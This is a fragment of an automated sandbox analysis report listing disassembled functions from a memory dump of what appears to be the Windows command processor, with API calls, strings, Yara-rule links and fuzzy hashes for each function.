                                                                                                          Function 00007FF7AB14B89C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • RtlCreateUnicodeStringFromAsciiz.NTDLL ref: 00007FF7AB14B934
                                                                                                          • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF7AB135085), ref: 00007FF7AB14B9A5
                                                                                                          • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF7AB135085), ref: 00007FF7AB14B9F7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                                                                                          • String ID: %WINDOWS_COPYRIGHT%
                                                                                                          • API String ID: 1103618819-1745581171
                                                                                                          • Opcode ID: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                                                                                          • Instruction ID: e1bc2d33ac69ab3b823338df7da5ca9f83cab449d26001522d2869cb45c017c0
                                                                                                          • Opcode Fuzzy Hash: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                                                                                          • Instruction Fuzzy Hash: 5541B7A290A78582EA119F1DF490279B7A0FB58B98FC64235DE4D033B5EF3DE485C710
                                                                                                          Function 00007FF7AB150774 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$_wcslwr
                                                                                                          • String ID: [%s]
                                                                                                          • API String ID: 886762496-302437576
                                                                                                          • Opcode ID: edde6ab5db54e3a5535b346c374fc5c976f6442aa931e6f93dfa572844f0dcb2
                                                                                                          • Instruction ID: 8d1f3e4eb93b0114cbb158e4caae41c6caa69f7e6dd261aa372cfab2b476413f
                                                                                                          • Opcode Fuzzy Hash: edde6ab5db54e3a5535b346c374fc5c976f6442aa931e6f93dfa572844f0dcb2
                                                                                                          • Instruction Fuzzy Hash: 1D318E32706B8285EB22DF29E8947E9A7A0FB49B88F854135CE4D47765DF3CD2498310
                                                                                                          Function 00007FF7AB1332E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB1333A8: iswspace.MSVCRT(?,?,00000000,00007FF7AB14D6EE,?,?,?,00007FF7AB140632), ref: 00007FF7AB1333C0
                                                                                                          • iswspace.MSVCRT(?,?,?,00007FF7AB1332A4), ref: 00007FF7AB13331C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: iswspace
                                                                                                          • String ID: off
                                                                                                          • API String ID: 2389812497-733764931
                                                                                                          • Opcode ID: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                                                                          • Instruction ID: bf99df712462ed68350412bcd18d303f19c7054b171c9514e7085e9de737bc3e
                                                                                                          • Opcode Fuzzy Hash: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                                                                          • Instruction Fuzzy Hash: 5221B221E0E64281FAAA7B1DF451279E690FF45B88FDAD134D90E476B0EF2CE5488325
                                                                                                          Function 00007FF7AB149308 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcschr$Heapiswspace$AllocProcess
                                                                                                          • String ID: %s=%s$DPATH$PATH
                                                                                                          • API String ID: 3731854180-3148396303
                                                                                                          • Opcode ID: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                                                                                          • Instruction ID: 52eb5630756f65305e382a3016376172bbdf3b35c429782c2e3527247026214e
                                                                                                          • Opcode Fuzzy Hash: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                                                                                          • Instruction Fuzzy Hash: 9821C561B0B64285FA56AB2DF480279A3A0AFC1BC8FC68135C90E473B4FE3CE5448360
                                                                                                          Function 00007FF7AB138198 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcscmp
                                                                                                          • String ID: *.*$????????.???
                                                                                                          • API String ID: 3392835482-3870530610
                                                                                                          • Opcode ID: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                                                                          • Instruction ID: c2ae2cd359e24ec2444e90a18d040f3b4858a4ef67765b7c9ab97e126a9d5fe6
                                                                                                          • Opcode Fuzzy Hash: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                                                                          • Instruction Fuzzy Hash: 4B11EC29B15A5281E7A9AF2AF440139B7A0FB44B84F5A5030CE4D47775EE3DE441C710
                                                                                                          Function 00007FF7AB149114 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: fprintf
                                                                                                          • String ID: CMD Internal Error %s$%s$Null environment
                                                                                                          • API String ID: 383729395-2781220306
                                                                                                          • Opcode ID: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                                                                          • Instruction ID: 7efa7412708c4475bc301aa16b60e94dd4ed1695ee7cc9a5d6cdb646dbe52e31
                                                                                                          • Opcode Fuzzy Hash: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                                                                          • Instruction Fuzzy Hash: F6116D6190A642C5EA56AB1CF9400B9A261EB45BF8FC69331D67E432F4BF2CA4858360
                                                                                                          Function 00007FF7AB1309F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: iswspacewcschr
                                                                                                          • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$=,;
                                                                                                          • API String ID: 287713880-1183017076
                                                                                                          • Opcode ID: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                                                                                          • Instruction ID: 21b945233a650d46c54d8d18057cd17d06190d5404fc315f8fc326cf345467fe
                                                                                                          • Opcode Fuzzy Hash: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                                                                                          • Instruction Fuzzy Hash: E7F03121A1A652C1EAAA9B09F444279F6D0BF45B48BC79171D95E43274FF2CD448C720
                                                                                                          Function 00007FF7AB1304F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                          • String ID: KERNEL32.DLL$SetThreadUILanguage
                                                                                                          • API String ID: 1646373207-2530943252
                                                                                                          • Opcode ID: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                                                                                          • Instruction ID: e2f0a8ee87b09dd26c0c39adb2910c4f5c23e842aece980b96ec8c6c7aa43abc
                                                                                                          • Opcode Fuzzy Hash: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                                                                                          • Instruction Fuzzy Hash: 37011E20E0BA06C1EA8AA71DF891134A2A0EF49738FC60735C53E027F0EE3C64859320
                                                                                                          Function 00007FF7AB1473C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                          • String ID: RaiseFailFastException$kernelbase.dll
                                                                                                          • API String ID: 1646373207-919018592
                                                                                                          • Opcode ID: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                                                                                          • Instruction ID: 55a6e5f289a37a147745bebc8e4648ae44375e3164dbfa1bb1a7601c7ac5f7e2
                                                                                                          • Opcode Fuzzy Hash: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                                                                                          • Instruction Fuzzy Hash: D4F03062B1978192E6066B1AF484079FB60FF89BD4B899634DA4E03734DF3CD485C710
                                                                                                          Function 00007FF7AB121130 Relevance: 6.2, APIs: 4, Instructions: 156COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$CurrentDirectorytowupper
                                                                                                          • String ID:
                                                                                                          • API String ID: 1403193329-0
                                                                                                          • Opcode ID: 8f12ec0cfcd936a987ebeb0b3721ecca5b9c81898bdfe4a19f372ac06b3fdf31
                                                                                                          • Instruction ID: f484e7fd1b5bde941f857ca0ce7f45721ff154ef6d1a4abcd4e3cc99f9964e91
                                                                                                          • Opcode Fuzzy Hash: 8f12ec0cfcd936a987ebeb0b3721ecca5b9c81898bdfe4a19f372ac06b3fdf31
                                                                                                          • Instruction Fuzzy Hash: 2761B032A19B82CAEB65EB29E8402ADB7A4FB4474CF914235DE5D037B9EF38D454C710
                                                                                                          Function 00007FF7AB134878 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcsnicmp$wcschr
                                                                                                          • String ID:
                                                                                                          • API String ID: 3270668897-0
                                                                                                          • Opcode ID: 0c5351208ff2a5a36442746df2c9d56de1180022aab67ae3c28b2a55d3b35da5
                                                                                                          • Instruction ID: 47e80d3b477e4105843065553cbda311e28f7f7b59457c5b16b0b4afe697e5dc
                                                                                                          • Opcode Fuzzy Hash: 0c5351208ff2a5a36442746df2c9d56de1180022aab67ae3c28b2a55d3b35da5
                                                                                                          • Instruction Fuzzy Hash: B4518412E0A74281FA9A7F1CF4501B9E2A1EF45B88FDA8131C94E476F9FE2CD5498370
                                                                                                          Function 00007FF7AB14F358 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$DriveFullNamePathType
                                                                                                          • String ID:
                                                                                                          • API String ID: 3442494845-0
                                                                                                          • Opcode ID: c4faa7a40be53a6a0e94dcc52435e0141cda1ae593caa646d4c93336f675662c
                                                                                                          • Instruction ID: d3852de53951b44649d88112ec1a83be244e6ef0272a4be7b0ae085fc7383aa1
                                                                                                          • Opcode Fuzzy Hash: c4faa7a40be53a6a0e94dcc52435e0141cda1ae593caa646d4c93336f675662c
                                                                                                          • Instruction Fuzzy Hash: 3531E232616BC2CAEB61DF18E8843E9B7A4FB88B88F854135DA4D47B24DF38D205C750
                                                                                                          Function 00007FF7AB138F80 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                          • String ID:
                                                                                                          • API String ID: 140117192-0
                                                                                                          • Opcode ID: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                                                                                          • Instruction ID: 60f49438f702568cb17fda4e0eefec3f3f77e0b57e5c23263d9f0e630bb7de42
                                                                                                          • Opcode Fuzzy Hash: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                                                                                          • Instruction Fuzzy Hash: 4D41F975A0AB0691EB52AB0CF880765B3A4FB88748FD20635D98D43774EF3DE598C720
                                                                                                          Function 00007FF7AB138470 Relevance: 6.1, APIs: 4, Instructions: 72stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcstol$lstrcmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 3515581199-0
                                                                                                          • Opcode ID: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                                                                                          • Instruction ID: 2d2c77706f86b86588af792687cade60a863a71b900a74d5f7732a779307aac3
                                                                                                          • Opcode Fuzzy Hash: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                                                                                          • Instruction Fuzzy Hash: 1121AC3660A64283E6EB6B7DF094139EF90FB4A748F965134DB4F03A74EE6CE4498710
                                                                                                          Function 00007FF7AB124F58 Relevance: 6.1, APIs: 4, Instructions: 72filetimeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File_get_osfhandle$TimeWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 4019809305-0
                                                                                                          • Opcode ID: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                                                                                          • Instruction ID: f3a629424f6519f46ab2c2c49881152a9fc54ff835a131c1d38d1bc6da72b246
                                                                                                          • Opcode Fuzzy Hash: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                                                                                          • Instruction Fuzzy Hash: 2B31D325A1A75682E7926B1CF480338E690BF49B98F965238DD0E43BF5DF3CD4848710
                                                                                                          Function 00007FF7AB151914 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
